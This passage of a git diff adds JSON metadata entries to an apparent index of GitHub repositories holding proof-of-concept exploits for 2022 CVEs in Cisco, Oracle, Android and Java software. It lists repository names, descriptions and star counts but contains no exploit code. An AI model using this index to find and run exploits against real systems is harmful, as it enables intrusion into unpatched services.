/dev/null +++ b/2022/CVE-2022-20494.json @@ -0,0 +1,33 @@ +[ + { + "id": 609257730, + "name": "CVE-2022-20494", + "full_name": "Supersonic\/CVE-2022-20494", + "owner": { + "login": "Supersonic", + "id": 36431699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36431699?v=4", + "html_url": "https:\/\/github.com\/Supersonic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Supersonic\/CVE-2022-20494", + "description": "Exploit app for CVE-2022-20494, a high severity permanent denial-of-service vulnerability that leverages Android's DND (Do not disturb) feature", + "fork": false, + "created_at": "2023-03-03T17:54:34Z", + "updated_at": "2024-09-15T04:50:07Z", + "pushed_at": "2023-03-03T18:11:07Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20607.json b/2022/CVE-2022-20607.json new file mode 100644 index 0000000000..539e94138a --- /dev/null +++ b/2022/CVE-2022-20607.json @@ -0,0 +1,33 @@ +[ + { + "id": 598379401, + "name": "CVE-2022-20607", + "full_name": "sumeetIT\/CVE-2022-20607", + "owner": { + "login": "sumeetIT", + "id": 54736912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54736912?v=4", + "html_url": "https:\/\/github.com\/sumeetIT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sumeetIT\/CVE-2022-20607", + "description": "In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N\/A CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-02-07T01:28:29Z", + "updated_at": "2023-02-20T12:01:39Z", + "pushed_at": "2022-12-27T12:10:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20699.json b/2022/CVE-2022-20699.json new file mode 100644 index 0000000000..ec4aaf2a2a --- /dev/null +++ b/2022/CVE-2022-20699.json @@ -0,0 +1,95 @@ +[ + { + "id": 456573106, + "name": "CVE-2022-20699", + "full_name": "Audiobahn\/CVE-2022-20699", + "owner": { + "login": "Audiobahn", + "id": 98435709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98435709?v=4", + "html_url": "https:\/\/github.com\/Audiobahn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Audiobahn\/CVE-2022-20699", + "description": "Cisco Anyconnect VPN unauth RCE (rwx stack)", + "fork": false, + "created_at": "2022-02-07T15:53:21Z", + "updated_at": "2024-11-26T06:21:11Z", + "pushed_at": "2022-02-07T15:55:03Z", + "stargazers_count": 239, + "watchers_count": 239, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 239, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 457817909, + "name": "CVE-2022-20699", + "full_name": "puckiestyle\/CVE-2022-20699", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-20699", + "description": null, + "fork": false, + "created_at": "2022-02-10T14:40:25Z", + "updated_at": "2022-02-10T14:40:40Z", + "pushed_at": "2022-02-10T14:40:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459040811, + "name": "CVE-2022-20699", + "full_name": "rohan-flutterint\/CVE-2022-20699", + "owner": { + "login": "rohan-flutterint", + "id": 82864904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82864904?v=4", + "html_url": "https:\/\/github.com\/rohan-flutterint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohan-flutterint\/CVE-2022-20699", + "description": null, + "fork": false, + "created_at": "2022-02-14T06:23:06Z", + "updated_at": "2022-11-05T15:57:52Z", + "pushed_at": "2022-02-14T06:23:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2078.json b/2022/CVE-2022-2078.json new file mode 100644 index 0000000000..857ec06808 --- /dev/null +++ b/2022/CVE-2022-2078.json @@ -0,0 +1,33 @@ +[ + { + "id": 610271448, + "name": "CVE-2022-2078", + "full_name": "delsploit\/CVE-2022-2078", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2022-2078", + "description": null, + "fork": false, + "created_at": "2023-03-06T12:49:29Z", + "updated_at": "2023-08-07T10:26:59Z", + "pushed_at": "2023-03-06T12:50:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20818.json b/2022/CVE-2022-20818.json new file mode 100644 index 0000000000..22667f4667 --- /dev/null +++ b/2022/CVE-2022-20818.json @@ -0,0 +1,39 @@ +[ + { + "id": 742645854, + "name": "CVE-2022-20818", + "full_name": "mbadanoiu\/CVE-2022-20818", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-20818", + "description": "CVE-2022-20818: Local Privilege Escalation via Partial File Read in Cisco SD-WAN", + "fork": false, + "created_at": "2024-01-13T00:17:53Z", + "updated_at": "2024-01-13T10:19:51Z", + "pushed_at": "2024-01-13T00:42:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-20818", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20866.json b/2022/CVE-2022-20866.json new file mode 100644 index 0000000000..331396af0d --- /dev/null +++ b/2022/CVE-2022-20866.json @@ -0,0 +1,33 @@ +[ + { + "id": 513519108, + "name": "CVE-2022-20866", + "full_name": "CiscoPSIRT\/CVE-2022-20866", + "owner": { + "login": "CiscoPSIRT", + "id": 15335164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15335164?v=4", + "html_url": "https:\/\/github.com\/CiscoPSIRT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CiscoPSIRT\/CVE-2022-20866", + "description": "RSA Key Checker for CVE-2022-20866", + "fork": false, + "created_at": "2022-07-13T12:48:49Z", + "updated_at": "2022-09-07T14:23:48Z", + "pushed_at": "2022-08-10T16:47:09Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2097.json b/2022/CVE-2022-2097.json new file mode 100644 index 0000000000..9a79a33883 --- /dev/null +++ b/2022/CVE-2022-2097.json @@ -0,0 +1,33 @@ +[ + { + "id": 511264690, + "name": "OpenSSLUpgrade1.1.1q-Ubuntu", + "full_name": "PeterThomasAwen\/OpenSSLUpgrade1.1.1q-Ubuntu", + "owner": { + "login": "PeterThomasAwen", + "id": 69471531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69471531?v=4", + "html_url": "https:\/\/github.com\/PeterThomasAwen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterThomasAwen\/OpenSSLUpgrade1.1.1q-Ubuntu", + "description": "A script to change OpenSSL versions on Ubuntu to 1.1.1q to protect against CVE-2022-2097.", + "fork": false, + "created_at": "2022-07-06T19:18:58Z", + "updated_at": "2024-04-16T20:23:15Z", + "pushed_at": "2022-07-06T19:20:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2109.json b/2022/CVE-2022-2109.json new file mode 100644 index 0000000000..57e7fe6b8c --- /dev/null +++ b/2022/CVE-2022-2109.json @@ -0,0 +1,33 @@ +[ + { + "id": 530633500, + "name": "oracle-weblogic-CVE-2021-2109", + "full_name": "Vulnmachines\/oracle-weblogic-CVE-2021-2109", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/oracle-weblogic-CVE-2021-2109", + "description": "Oracle Weblogic RCE - CVE-2022-2109", + "fork": false, + "created_at": "2022-08-30T11:50:17Z", + "updated_at": "2023-01-11T16:07:19Z", + "pushed_at": "2022-08-30T11:52:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21241.json b/2022/CVE-2022-21241.json new file mode 100644 index 0000000000..da94812e1d --- /dev/null +++ b/2022/CVE-2022-21241.json @@ -0,0 +1,38 @@ +[ + { + "id": 379108906, + "name": "csv-plus_vulnerability", + "full_name": "satoki\/csv-plus_vulnerability", + "owner": { + "login": "satoki", + "id": 54702093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54702093?v=4", + "html_url": "https:\/\/github.com\/satoki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satoki\/csv-plus_vulnerability", + "description": "👻 [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)", + "fork": false, + "created_at": "2021-06-22T01:36:16Z", + "updated_at": "2024-08-12T20:14:09Z", + "pushed_at": "2022-02-11T13:59:14Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity", + "exploit", + "poc", + "security" + ], + "visibility": "public", + "forks": 8, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21306.json b/2022/CVE-2022-21306.json new file mode 100644 index 0000000000..8a18ec6b30 --- /dev/null +++ b/2022/CVE-2022-21306.json @@ -0,0 +1,33 @@ +[ + { + "id": 624702558, + "name": "CVE-2022-21306", + "full_name": "hktalent\/CVE-2022-21306", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-21306", + "description": "POC,EXP,chatGPT for me,只能给一些思路,全部不可用", + "fork": false, + "created_at": "2023-04-07T03:59:07Z", + "updated_at": "2023-04-07T03:59:43Z", + "pushed_at": "2023-04-07T03:59:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21340.json b/2022/CVE-2022-21340.json new file mode 100644 index 0000000000..a7198a6ffc --- /dev/null +++ b/2022/CVE-2022-21340.json @@ -0,0 +1,41 @@ +[ + { + "id": 784177636, + "name": "CVE-2022-21340", + "full_name": "Alexandre-Bartel\/CVE-2022-21340", + "owner": { + "login": "Alexandre-Bartel", + "id": 655248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/655248?v=4", + "html_url": "https:\/\/github.com\/Alexandre-Bartel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alexandre-Bartel\/CVE-2022-21340", + "description": "PoC for CVE-2022-21340", + "fork": false, + "created_at": "2024-04-09T10:41:12Z", + "updated_at": "2024-04-09T10:45:03Z", + "pushed_at": "2024-04-09T10:44:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "denial-of-service", + "dos", + "java", + "openjdk", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21350.json b/2022/CVE-2022-21350.json new file mode 100644 index 0000000000..c47ac96d67 --- /dev/null +++ b/2022/CVE-2022-21350.json @@ -0,0 +1,33 @@ +[ + { + "id": 542425330, + "name": "CVE-2022-21350", + "full_name": "hktalent\/CVE-2022-21350", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-21350", + "description": null, + "fork": false, + "created_at": "2022-09-28T05:38:15Z", + "updated_at": "2024-01-15T17:50:10Z", + "pushed_at": "2024-02-28T09:49:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21371.json b/2022/CVE-2022-21371.json new file mode 100644 index 0000000000..e38759e2b1 --- /dev/null +++ b/2022/CVE-2022-21371.json @@ -0,0 +1,111 @@ +[ + { + "id": 451918204, + "name": "CVE-2022-21371", + "full_name": "Mr-xn\/CVE-2022-21371", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-21371", + "description": "Oracle WebLogic Server 12.1.3.0.0 \/ 12.2.1.3.0 \/ 12.2.1.4.0 \/ 14.1.1.0.0 Local File Inclusion", + "fork": false, + "created_at": "2022-01-25T14:50:29Z", + "updated_at": "2024-08-12T20:20:04Z", + "pushed_at": "2022-01-25T14:52:21Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 528880899, + "name": "Oracle-WebLogic-CVE-2022-21371", + "full_name": "Vulnmachines\/Oracle-WebLogic-CVE-2022-21371", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Oracle-WebLogic-CVE-2022-21371", + "description": "Oracle WebLogic CVE-2022-21371", + "fork": false, + "created_at": "2022-08-25T14:12:33Z", + "updated_at": "2024-08-12T20:26:29Z", + "pushed_at": "2022-08-31T19:59:45Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 810939629, + "name": "CVE-2022-21371", + "full_name": "Cappricio-Securities\/CVE-2022-21371", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2022-21371", + "description": "Oracle WebLogic Server (LFI)", + "fork": false, + "created_at": "2024-06-05T16:29:16Z", + "updated_at": "2024-06-24T10:35:46Z", + "pushed_at": "2024-06-24T10:35:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2022-21371", + "cve-2022-21371-poc", + "cve-2022-21371-scanner", + "lfi", + "lfi-detection", + "lfi-exploitation", + "lfi-exploiter", + "lfi-scanner", + "lfi-vulnerability", + "local-file-inclusion", + "oracle-weblogic-server", + "oracle-weblogic-server-lfi" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21392.json b/2022/CVE-2022-21392.json new file mode 100644 index 0000000000..f5be845916 --- /dev/null +++ b/2022/CVE-2022-21392.json @@ -0,0 +1,39 @@ +[ + { + "id": 729286928, + "name": "CVE-2022-21392", + "full_name": "mbadanoiu\/CVE-2022-21392", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-21392", + "description": "CVE-2022-21392: Local Privilege Escalation via NMR SUID in Oracle Enterprise Manager ", + "fork": false, + "created_at": "2023-12-08T20:13:23Z", + "updated_at": "2024-08-12T20:33:05Z", + "pushed_at": "2023-12-08T20:27:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-21392", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21445.json b/2022/CVE-2022-21445.json new file mode 100644 index 0000000000..5df6d9129f --- /dev/null +++ b/2022/CVE-2022-21445.json @@ -0,0 +1,33 @@ +[ + { + "id": 770745685, + "name": "CVE-2022-21445-for-12.2.1.3.0-Weblogic", + "full_name": "hienkiet\/CVE-2022-21445-for-12.2.1.3.0-Weblogic", + "owner": { + "login": "hienkiet", + "id": 63083901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63083901?v=4", + "html_url": "https:\/\/github.com\/hienkiet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hienkiet\/CVE-2022-21445-for-12.2.1.3.0-Weblogic", + "description": null, + "fork": false, + "created_at": "2024-03-12T04:47:02Z", + "updated_at": "2024-12-25T09:52:56Z", + "pushed_at": "2024-03-18T07:32:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21449.json b/2022/CVE-2022-21449.json index f3c41294d7..5a3fae8c8f 100644 --- a/2022/CVE-2022-21449.json +++ b/2022/CVE-2022-21449.json @@ -215,5 +215,131 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 519281774, + "name": "CVE-2022-21449-showcase", + "full_name": "Skipper7718\/CVE-2022-21449-showcase", + "owner": { + "login": "Skipper7718", + "id": 66838226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66838226?v=4", + "html_url": "https:\/\/github.com\/Skipper7718", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Skipper7718\/CVE-2022-21449-showcase", + "description": null, + "fork": false, + "created_at": "2022-07-29T16:33:10Z", + "updated_at": "2022-07-29T16:33:26Z", + "pushed_at": "2022-07-30T20:05:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530559822, + "name": "CVE-2022-21449", + "full_name": "davwwwx\/CVE-2022-21449", + "owner": { + "login": "davwwwx", + "id": 26136505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26136505?v=4", + "html_url": "https:\/\/github.com\/davwwwx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davwwwx\/CVE-2022-21449", + "description": "repo showcasing generating \"psychic signatures for java\" implemented in a nodejs environment 😅", + "fork": false, + "created_at": "2022-08-30T08:12:24Z", + "updated_at": "2023-01-12T14:45:24Z", + "pushed_at": "2023-01-12T14:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21449" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 532526273, + "name": "CVE-2022-21449", + "full_name": "AlexanderZinoni\/CVE-2022-21449", + "owner": { + "login": "AlexanderZinoni", + "id": 93882101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93882101?v=4", + "html_url": "https:\/\/github.com\/AlexanderZinoni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlexanderZinoni\/CVE-2022-21449", + "description": null, + "fork": false, + "created_at": "2022-09-04T11:56:58Z", + "updated_at": "2023-11-03T15:22:18Z", + "pushed_at": "2024-03-19T17:28:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836527056, + "name": "AIS3-2024-Project-D5Team", + "full_name": "HeyMrSalt\/AIS3-2024-Project-D5Team", + "owner": { + "login": "HeyMrSalt", + "id": 173133346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173133346?v=4", + "html_url": "https:\/\/github.com\/HeyMrSalt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HeyMrSalt\/AIS3-2024-Project-D5Team", + "description": "Reappear-CVE-2022-21449-TLS-PoC", + "fork": false, + "created_at": "2024-08-01T03:27:17Z", + "updated_at": "2024-10-17T21:19:59Z", + "pushed_at": "2024-10-17T21:19:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-21500.json b/2022/CVE-2022-21500.json new file mode 100644 index 0000000000..281d36a6cf --- /dev/null +++ b/2022/CVE-2022-21500.json @@ -0,0 +1,40 @@ +[ + { + "id": 812484365, + "name": "CVE-2022-21500", + "full_name": "Cappricio-Securities\/CVE-2022-21500", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2022-21500", + "description": "Oracle E-Business Suite <=12.2 - Authentication Bypass", + "fork": false, + "created_at": "2024-06-09T02:59:45Z", + "updated_at": "2024-06-24T10:52:01Z", + "pushed_at": "2024-06-24T10:50:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-21500", + "ebs", + "oracle", + "pentesting", + "wpt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21587.json b/2022/CVE-2022-21587.json new file mode 100644 index 0000000000..59e8539c65 --- /dev/null +++ b/2022/CVE-2022-21587.json @@ -0,0 +1,95 @@ +[ + { + "id": 597954094, + "name": "CVE-2022-21587-POC", + "full_name": "hieuminhnv\/CVE-2022-21587-POC", + "owner": { + "login": "hieuminhnv", + "id": 28292732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28292732?v=4", + "html_url": "https:\/\/github.com\/hieuminhnv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hieuminhnv\/CVE-2022-21587-POC", + "description": "CVE-2022-21587 POC ", + "fork": false, + "created_at": "2023-02-06T04:18:24Z", + "updated_at": "2023-05-06T15:24:03Z", + "pushed_at": "2023-02-17T09:22:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604991320, + "name": "Oracle-E-BS-CVE-2022-21587-Exploit", + "full_name": "rockmelodies\/Oracle-E-BS-CVE-2022-21587-Exploit", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/Oracle-E-BS-CVE-2022-21587-Exploit", + "description": "Oracle E-BS CVE-2022-21587 Exploit", + "fork": false, + "created_at": "2023-02-22T08:00:38Z", + "updated_at": "2024-09-23T09:01:19Z", + "pushed_at": "2023-02-14T03:46:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609134090, + "name": "CVE-2022-21587-Oracle-EBS-", + "full_name": "sahabrifki\/CVE-2022-21587-Oracle-EBS-", + "owner": { + "login": "sahabrifki", + "id": 26023743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26023743?v=4", + "html_url": "https:\/\/github.com\/sahabrifki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahabrifki\/CVE-2022-21587-Oracle-EBS-", + "description": "This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)", + "fork": false, + "created_at": "2023-03-03T12:56:58Z", + "updated_at": "2024-12-07T12:01:17Z", + "pushed_at": "2023-03-03T13:12:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21658.json b/2022/CVE-2022-21658.json new file mode 100644 index 0000000000..5961557bf1 --- /dev/null +++ b/2022/CVE-2022-21658.json @@ -0,0 +1,37 @@ +[ + { + "id": 450374545, + "name": "cve-2022-21658", + "full_name": "sagittarius-a\/cve-2022-21658", + "owner": { + "login": "sagittarius-a", + "id": 8809698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8809698?v=4", + "html_url": "https:\/\/github.com\/sagittarius-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sagittarius-a\/cve-2022-21658", + "description": "POC for cve-2022-21658", + "fork": false, + "created_at": "2022-01-21T06:09:16Z", + "updated_at": "2023-10-03T02:34:46Z", + "pushed_at": "2022-01-21T06:09:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21658", + "poc", + "rust" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21660.json 